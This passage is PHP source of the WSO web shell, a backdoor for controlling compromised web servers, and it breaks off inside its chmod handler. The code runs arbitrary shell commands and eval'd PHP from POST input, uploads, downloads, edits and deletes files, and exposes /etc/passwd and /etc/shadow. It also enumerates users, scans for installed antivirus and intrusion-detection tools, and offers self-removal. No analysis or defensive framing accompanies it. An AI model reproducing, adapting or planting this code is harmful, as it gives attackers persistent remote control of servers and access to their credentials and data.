<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }

    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0; $i<$n-1; $i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0; $j<=$i; $j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }

    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce');
    if(!empty($GLOBALS['auth_pass']))
        $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

    $drives = "";
    if($GLOBALS['os'] == 'win') {
        foreach(range('c','z') as $drive)
        if(is_dir($drive.':\\'))
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    }
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
       . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}

function wsoFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
    <tr>
        <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
        <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
        <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
        <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
    </tr></table></div></body></html>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;} }

function wsoEx($in) {
    $out = '';
    if (function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}

function wsoViewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f', $s / 1024 ) . ' KB';
    else
        return $s . ' B';
}

function wsoPerms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    return $i;
}

function wsoPermsColor($f) {
    if (!@is_readable($f))
        return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
    elseif (!@is_writable($f))
        return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
    else
        return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}

function wsoScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function wsoWhich($p) {
    $path = wsoEx('which ' . $p);
    if(!empty($path))
        return $path;
    return false;
}

function actionSecInfo() {
    wsoHeader();
    echo '<h1>Server security information</h1><div class=content>';
    function wsoSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>' . $n . ': </span>';
            if(strpos($v, "\n") === false)
                echo $v . '<br>';
            else
                echo '<pre class=ml1>' . $v . '</pre>';
        }
    }

    wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
    wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    wsoSecParam('Open base dir', @ini_get('open_basedir'));
    wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    wsoSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';

    if($GLOBALS['os'] == 'nix') {
            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            wsoSecParam('OS version', @file_get_contents('/proc/version'));
            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                wsoSecParam('HDD space', wsoEx('df -h'));
                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                    $temp = "";
                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                        $uid = @posix_getpwuid($_POST['p2']);
                        if ($uid)
                            $temp .= join(':',$uid)."\n";
                    }
                    echo '<br/>';
                    wsoSecParam('Users', $temp);
                }
            }
    } else {
        wsoSecParam('OS Version',wsoEx('ver'));
        wsoSecParam('Account Settings',wsoEx('net accounts'));
        wsoSecParam('User Accounts',wsoEx('net user'));
    }
    echo '</div>';
    wsoFooter();
}

function actionPhp() {
    if(isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
        ob_start();
        eval($_POST['p1']);
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if(empty($_POST['ajax']) && !empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);

    wsoHeader();
    if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
        echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace(array (
            '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
            '!td, th {(.*)}!msiU',
            '!<img[^>]+>!msiU',
        ), array (
            '',
            '.e, .v, .h, .h th {$1}',
            ''
        ), $tmp);
        echo str_replace('<h1','<h2', $tmp) .'</div><br>';
    }
    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    wsoFooter();
}

function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);

    if(!empty($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    @rmdir($path);
                }
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_COOKIE['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false)
                                if (($f != ".") and ($f != ".."))
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                        } elseif(is_file($c.$s))
                            @copy($c.$s, $d.$s);
                    }
                    foreach($_COOKIE['f'] as $f)
                        copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
                } elseif($_COOKIE['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false)
                                if (($f != ".") and ($f != ".."))
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                        } elseif(@is_file($c.$s))
                            @copy($c.$s, $d.$s);
                    }
                    foreach($_COOKIE['f'] as $f)
                        @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
                } elseif($_COOKIE['act'] == 'zip') {
                    if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
                } elseif($_COOKIE['act'] == 'unzip') {
                    if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
                } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
                }
                unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
                break;
            default:
                if(!empty($_POST['p1'])) {
                    WSOsetcookie('act', $_POST['p1']);
                    WSOsetcookie('f', serialize(@$_POST['f']));
                    WSOsetcookie('c', @$_POST['c']);
                }
                break;
        }
    }
    wsoHeader();
    echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
    $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
echo "<script>
    function sa() {
        for(i=0;i<d.files.elements.length;i++)
            if(d.files.elements[i].type == 'checkbox')
                d.files.elements[i].checked = d.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
                     'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                    );
        if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
        elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    function wsoCmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
    }
    usort($files, "wsoCmp");
    usort($dirs, "wsoCmp");
    $files = array_merge($dirs, $files);
    $l = 0;
    foreach($files as $f) {
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
    echo "<tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
    <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    echo "<option value='tar'>Compress (tar.gz)</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>Paste / Compress</option>";
    echo "</select> ";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> ";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
    wsoFooter();
}

function actionStringTools() {
    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'binhex',
        'BIN to DEC' => 'bindec',
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    if(isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
        ob_start();
        if(in_array($_POST['p1'], $stringTools))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
    wsoHeader();
    echo '<h1>String conversions</h1><div class=content>';
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
        echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div><br><h1>Search files:</h1><div class=content>
        <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
            <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
            <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
            <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
            <tr><td></td><td><input type='submit' value='>>'></td></tr>
            </table></form>";

    function wsoRecursiveGlob($path) {
        if(substr($path, -1) != '/')
            $path.='/';
        $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
        if(is_array($paths)&&@count($paths)) {
            foreach($paths as $item) {
                if(@is_dir($item)){
                    if($path!=$item)
                        wsoRecursiveGlob($item);
                } else {
                    if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
                        echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
                }
            }
        }
    }
    if(@$_POST['p3'])
        wsoRecursiveGlob($_POST['c']);
    wsoFooter();
}

function actionFilesTools() {
    if( isset($_POST['p1']) )
        $_POST['p1'] = urldecode($_POST['p1']);
    if(@$_POST['p2']=='download') {
        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: " . $type);
            } else
                header("Content-Type: application/octet-stream");
            $fp = @fopen($_POST['p1'], "r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp, 1024);
                fclose($fp);
            }
        }exit;
    }
    if( @$_POST['p2'] == 'mkfile' ) {
        if(!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    wsoHeader();
    echo '<h1>File tools</h1><div class=content>';
    if( !file_exists(@$_POST['p1']) ) {
        echo 'File not exists';
        wsoFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    if(!$uid) {
        $uid['name'] = @fileowner($_POST['p1']);
        $gid['name'] = @filegroup($_POST['p1']);
    } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty($_POST['p2']) )
        $_POST['p2'] = 'view';
    if( is_file($_POST['p1']) )
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
    else
        $m = array('Chmod', 'Rename', 'Touch');
    foreach($m as $v)
        echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
    echo '<br><br>';
    switch($_POST['p2']) {
        case 'view':
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
        case 'highlight':
            if( @is_readable($_POST['p1']) ) {
                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                $code = @highlight_file($_POST['p1'],true);
                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
            }
            break;
        case 'chmod':
            if( !empty($_POST['p3']) ) {
                $perms = 0;
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                if(!@chmod($_POST['p1'], $perms))
